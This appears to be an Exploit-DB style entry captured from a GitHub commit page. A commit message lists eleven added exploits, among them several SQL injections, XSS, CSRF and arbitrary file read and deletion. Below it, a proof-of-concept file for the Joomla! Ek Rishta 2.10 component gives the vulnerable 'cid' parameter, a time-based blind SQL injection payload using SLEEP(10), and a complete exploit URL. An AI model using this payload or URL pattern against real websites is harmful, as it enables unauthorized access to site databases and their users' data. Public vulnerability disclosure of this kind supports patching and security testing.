1877107e5a
11 changes to exploits/shellcodes WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS WampServer 3.0.6 - Cross-Site Request Forgery Schools Alert Management Script - SQL Injection WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection Event Manager Admin panel - 'events_new.php' SQL injection Joomla! Component EkRishta 2.10 - 'cid' SQL Injection Schools Alert Management Script - Arbitrary File Deletion userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting userSpice 4.3.24 - Username Enumeration Schools Alert Management Script - 'get_sec.php' SQL Injection Schools Alert Management Script - Arbitrary File Read
24 lines
No EOL
657 B
Text
24 lines
No EOL
657 B
Text
# # # #
|
|
# Exploit Title: Joomla! Component Ek Rishta 2.10 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 08.06.2018
|
|
# Vendor Homepage: https://www.joomlaextensions.co.in/
|
|
# Software Link: https://extensions.joomla.org/extension/ek-rishta/
|
|
# Version: 2.10
|
|
# Tested on: WiN7_x64/
|
|
# video : https://youtu.be/UWGFVUU9AU0
|
|
# # # #
|
|
# Exploit Author: 41!kh4224rDz
|
|
# # # #
|
|
# ------------------------------SQL
|
|
Injection----------------------------------------
|
|
# POC:
|
|
# Parameter : user_detail&cid
|
|
# Payload : 1%' AND SLEEP(10)%23
|
|
#
|
|
# 1)
|
|
#
|
|
http://localhost/[PATH]/index.php?option=com_ekrishta&view=user_detail&cid=941%%27%20AND%20SLEEP(10)%23
|
|
#
|
|
#
|
|
# # # # |